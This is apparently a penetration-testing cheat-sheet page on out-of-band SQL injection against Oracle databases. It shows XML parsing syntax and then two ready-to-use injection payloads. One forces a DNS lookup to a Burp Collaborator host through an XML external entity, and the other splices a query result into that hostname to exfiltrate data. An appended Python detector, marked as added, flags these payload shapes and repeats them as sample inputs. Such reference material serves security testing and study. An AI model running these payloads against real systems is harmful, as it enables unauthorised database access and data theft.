# Out-Of-Band

## XML integration syntax

<table><thead><tr><th>Database</th><th>Syntax</th></tr></thead><tbody><tr><td>Oracle</td><td><pre><code>SELECT XMLTYPE('&#x3C;?xml version="1.0"?>&#x3C;document>&#x3C;employee>John&#x3C;/employee>&#x3C;/document>')
FROM dual;
</code></pre></td></tr><tr><td>PostgreSQL</td><td><pre><code>SELECT XMLPARSE(DOCUMENT '&#x3C;?xml version="1.0"?>&#x3C;document>&#x3C;employee>John&#x3C;/employee>&#x3C;/document>');
</code></pre></td></tr></tbody></table>

## Simple DNS lookup

```sql
' UNION SELECT EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l') FROM dual--
```

## Data exfiltration

```sql
' UNION SELECT EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(<SQL_QUERY_HERE>)||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l') FROM dual--
```

<figure><img src="https://3571537825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOIXudYEdnnE8JjXBrL0o%2Fuploads%2FOb3FlGs42GB0cNwUZnDV%2Fimage.png?alt=media&#x26;token=4a9756d4-6e08-44b1-831e-270f2de29848" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3571537825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOIXudYEdnnE8JjXBrL0o%2Fuploads%2FbHyNmPFO1PW4LY3MHoc1%2Fimage.png?alt=media&#x26;token=c3e4651e-dc93-4ac2-ab1c-497070e6dcae" alt=""><figcaption></figcaption></figure>
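A detection sketch for the two payload shapes above, added here as an example and not part of the original page: it URL-decodes a request parameter and flags an external entity declaration handed to a SQL XML function. The function names, the regexes and the `oob.example` host are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# SQL functions (Oracle / PostgreSQL) that parse XML supplied inside a statement.
XML_SINK = re.compile(r"\b(xmltype|extractvalue|xmlparse)\s*\(", re.I)
# External entity declaration: <!ENTITY [%] name SYSTEM|PUBLIC "..."
EXT_ENTITY = re.compile(r"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\s+[\"']", re.I)
# SQL string concatenation spliced into the entity URL (the exfiltration form).
CONCAT_IN_URL = re.compile(r"(SYSTEM|PUBLIC)\s+[\"']\w+://'\s*\|\|", re.I)


def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded input is normalised first."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(raw_param):
    """Return 'exfiltration', 'lookup' or None for one request parameter."""
    text = decode(raw_param)
    # Legitimate XML passed to these functions has no external entity.
    if not (XML_SINK.search(text) and EXT_ENTITY.search(text)):
        return None
    return "exfiltration" if CONCAT_IN_URL.search(text) else "lookup"


# Constructed sample inputs (placeholder host and query, not real traffic).
_HEAD = """' UNION SELECT EXTRACTVALUE(xmltype('<!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//"""
_TAIL = """/">+%25remote%3b]>'),'/l') FROM dual--"""
SAMPLES = {
    "lookup": _HEAD + "oob.example" + _TAIL,
    "exfiltration": _HEAD + "'||(<SQL_QUERY_HERE>)||'.oob.example" + _TAIL,
    "benign": "SELECT XMLTYPE('<document><employee>John</employee></document>') FROM dual",
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:13} -> {classify(value)}")
```

A match on request input is a signal to correlate with outbound DNS or HTTP from the database host, which should have no egress to arbitrary destinations in the first place.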
